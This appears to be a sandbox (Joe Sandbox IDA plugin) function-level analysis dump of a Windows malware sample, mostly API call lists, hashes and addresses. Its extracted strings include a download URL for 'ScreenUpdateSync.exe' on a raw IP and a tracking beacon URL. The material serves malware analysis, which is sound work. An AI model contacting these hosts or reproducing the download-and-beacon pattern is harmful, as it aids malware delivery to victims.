                                                              • Instruction Fuzzy Hash: D7526975A01229DFDB64CF68C984BADBBB1BF09304F1480DAE55DAB351DB30AA85CF14

                                                              Control-flow Graph

                                                              APIs
                                                              • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
                                                                • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
                                                              • InternetCloseHandle.WININET(00000000), ref: 00402E4B
                                                              • InternetCloseHandle.WININET(00000000), ref: 00402E4E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseHandleOpen_wcslen
                                                              • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                              • API String ID: 3067768807-1501832161
                                                              • Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                              • Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
                                                              • Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                              • Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                              • String ID:
                                                              • API String ID: 1687354797-0
                                                              • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                              • Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
                                                              • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                              • Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

                                                              Control-flow Graph

                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                              • int.LIBCPMT ref: 0040C1B1
                                                                • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                              • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                              • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                              • String ID:
                                                              • API String ID: 2243866535-0
                                                              • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                              • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                              • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                              • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99

                                                              Control-flow Graph

                                                              APIs
                                                              • std::_Cnd_initX.LIBCPMT ref: 0040581C
                                                              • __Cnd_signal.LIBCPMT ref: 00405828
                                                              • std::_Cnd_initX.LIBCPMT ref: 0040583D
                                                              • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                              • String ID:
                                                              • API String ID: 2059591211-0
                                                              • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                              • Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
                                                              • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                              • Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

                                                              Control-flow Graph

                                                              APIs
                                                              • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                              • ExitThread.KERNEL32 ref: 0042DFDA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorExitLastThread
                                                              • String ID: F(@
                                                              • API String ID: 1611280651-2698495834
                                                              • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                              • Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
                                                              • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                              • Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 463 42e114-42e11f 464 42e121-42e133 call 42eac9 call 42a59d 463->464 465 42e135-42e148 call 42e0cb 463->465 479 42e185-42e188 464->479 471 42e176 465->471 472 42e14a-42e167 CreateThread 465->472 476 42e178-42e184 call 42e03d 471->476 474 42e189-42e18e 472->474 475 42e169-42e175 GetLastError call 42ea93 472->475 477 42e190-42e193 474->477 478 42e195-42e197 474->478 475->471 476->479 477->478 478->476
                                                              APIs
                                                              • CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
                                                              • GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
                                                              • __dosmaperr.LIBCMT ref: 0042E170
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorLastThread__dosmaperr
                                                              • String ID:
                                                              • API String ID: 2744730728-0
                                                              • Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                              • Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
                                                              • Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                              • Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 484 434755-43476d call 439921 487 434780-434796 SetFilePointerEx 484->487 488 43476f-434774 call 42eac9 484->488 489 4347a7-4347b1 487->489 490 434798-4347a5 GetLastError call 42ea93 487->490 494 43477a-43477e 488->494 493 4347b3-4347c8 489->493 489->494 490->494 496 4347cd-4347d2 493->496 494->496
                                                              APIs
                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
                                                              • GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
                                                              • __dosmaperr.LIBCMT ref: 0043479F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                              • String ID:
                                                              • API String ID: 2336955059-0
                                                              • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                              • Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
                                                              • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                              • Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 498 402bad-402bd9 RegCreateKeyExW 499 402bdb-402bed RegSetValueExW 498->499 500 402bef-402bf2 498->500 499->500 501 402bf4-402bf7 RegCloseKey 500->501 502 402bfd-402c03 500->502 501->502
                                                              APIs
                                                              • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
                                                              • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
                                                              • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateValue
                                                              • String ID:
                                                              • API String ID: 1818849710-0
                                                              • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                              • Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
                                                              • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                              • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 503 42e074-42e081 call 431f5e 506 42e083-42e086 ExitThread 503->506 507 42e08c-42e094 503->507 507->506 508 42e096-42e09a 507->508 509 42e0a1-42e0a7 508->509 510 42e09c call 4354f6 508->510 512 42e0b4-42e0ba 509->512 513 42e0a9-42e0ab 509->513 510->509 512->506 514 42e0bc-42e0be 512->514 513->512 515 42e0ad-42e0ae CloseHandle 513->515 514->506 516 42e0c0-42e0ca FreeLibraryAndExitThread 514->516 515->512
                                                              APIs
                                                                • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
                                                                • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                              • ExitThread.KERNEL32 ref: 0042E086
                                                              • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
                                                              • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                              • String ID:
                                                              • API String ID: 1198197534-0
                                                              • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                              • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
                                                              • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                              • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 517 40239e-4023ac 518 402561-402563 PostQuitMessage 517->518 519 4023b2-4023b7 517->519 520 402569-40256e 518->520 521 4023d0-4023d7 519->521 522 4023b9-4023cb DefWindowProcW 519->522 523 4023d9 call 401da4 521->523 524 4023de-4023e5 521->524 522->520 523->524 524->520 526 4023eb-40255f call 4010ba call 4029f4 524->526 526->520
                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
                                                              • PostQuitMessage.USER32(00000000), ref: 00402563
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: MessagePostProcQuitWindow
                                                              • String ID:
                                                              • API String ID: 3873111417-0
                                                              • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                              • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
                                                              • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                              • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E
                                                              APIs
                                                              • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                                • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$Sleep
                                                              • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                              • API String ID: 3358372957-3120454669
                                                              • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                              • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                              • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                              • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0040298F
                                                              • __fassign.LIBCMT ref: 0040299F
                                                                • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                              • String ID:
                                                              • API String ID: 2843524283-0
                                                              • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                              • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                              • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                              • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                              APIs
                                                              • std::_Locinfo::_Locinfo.LIBCPMT ref: 0040C0E9
                                                                • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                                • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                                • Part of subcall function 0040BF2A: __Getctype.LIBCPMT ref: 0040BF45
                                                              • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0040C0FD
                                                                • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                                • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: std::_$Locinfo::_$LocinfoLockit$GetctypeLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                              • String ID:
                                                              • API String ID: 3634385808-0
                                                              • Opcode ID: ae6b82ab4aa1cb2813410f5dbc9e26b8ea2e08ff5e6c6b46999cb03fa267a897
                                                              • Instruction ID: 5b43c555da5e36d5f90762d8cf6af0aa3317985bb24b5d7811fbdb20f9a73e34
                                                              • Opcode Fuzzy Hash: ae6b82ab4aa1cb2813410f5dbc9e26b8ea2e08ff5e6c6b46999cb03fa267a897
                                                              • Instruction Fuzzy Hash: 54F05832500215DADB21EBA5C852B9C7371AF40714F60813BF505BB2C2DBB85A488A8C
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000400,?,?,02470223,?,?), ref: 02470E19
                                                              • SetErrorMode.KERNEL32(00000000,?,?,02470223,?,?), ref: 02470E1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction ID: df7174f9f57e46548dd531f3c2dfcdef14bbfe03a49bac81fa522fe882d0dbf2
                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction Fuzzy Hash: 22D0123114512877D7002A94DC09BCE7B1CDF09B66F008011FB0DD9180C770954046E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                              • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                              • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                              • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: __fread_nolock
                                                              • String ID:
                                                              • API String ID: 2638373210-0
                                                              • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                              • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                              • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                              • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                              APIs
                                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Ios_base_dtorstd::ios_base::_
                                                              • String ID:
                                                              • API String ID: 323602529-0
                                                              • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                              • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                              • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                              • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                              APIs
                                                                • Part of subcall function 0040C618: __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                              • std::locale::_Init.LIBCPMT ref: 00404911
                                                                • Part of subcall function 0040DB27: std::_Lockit::_Lockit.LIBCPMT ref: 0040DB39
                                                                • Part of subcall function 0040DB27: std::locale::_Setgloballocale.LIBCPMT ref: 0040DB54
                                                                • Part of subcall function 0040DB27: _Yarn.LIBCPMT ref: 0040DB6A
                                                                • Part of subcall function 0040DB27: std::_Lockit::~_Lockit.LIBCPMT ref: 0040DBAA
                                                                • Part of subcall function 0040C189: std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                                • Part of subcall function 0040C189: int.LIBCPMT ref: 0040C1B1
                                                                • Part of subcall function 0040C189: std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                                • Part of subcall function 0040C189: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Lockitstd::_$std::locale::_$Lockit::_Lockit::~_$Exception@8GetfacetInitSetgloballocaleThrowYarn
                                                              • String ID:
                                                              • API String ID: 254928049-0
                                                              • Opcode ID: 3c060e6656c3a05c784b0ffece6a0fdcb2b1fe0aa515981086c4a2bd745adef2
                                                              • Instruction ID: 05a577be79a6d9972e4bbd44f5ae502994491d5de74025c362d1bb0bcb2044eb
                                                              • Opcode Fuzzy Hash: 3c060e6656c3a05c784b0ffece6a0fdcb2b1fe0aa515981086c4a2bd745adef2
                                                              • Instruction Fuzzy Hash: 772129B0A00706EFD714DF6AC185A59FBF4BF48314F50823EE449A7A81C774A964CB98
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch
                                                              • String ID:
                                                              • API String ID: 3886170330-0
                                                              • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                              • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
                                                              • Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                              • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: __wsopen_s
                                                              • String ID:
                                                              • API String ID: 3347428461-0
                                                              • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                              • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                              • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                              • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00434D6B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 480f1ce45d14040ee3ea33e8ab56172a2f2fc49c365442aad9b5ef05e54ba84d
                                                              • Instruction ID: f345a31986333b625da5146037888f7e6802a523d24ce61ba0d80c33f3994584
                                                              • Opcode Fuzzy Hash: 480f1ce45d14040ee3ea33e8ab56172a2f2fc49c365442aad9b5ef05e54ba84d
                                                              • Instruction Fuzzy Hash: 99F0BB31600520669B212F679C01BA73B48AFC9760F546527A804AB254DB2CF900459D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                              • Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
                                                              • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                              • Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                              • Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
                                                              • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                              • Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
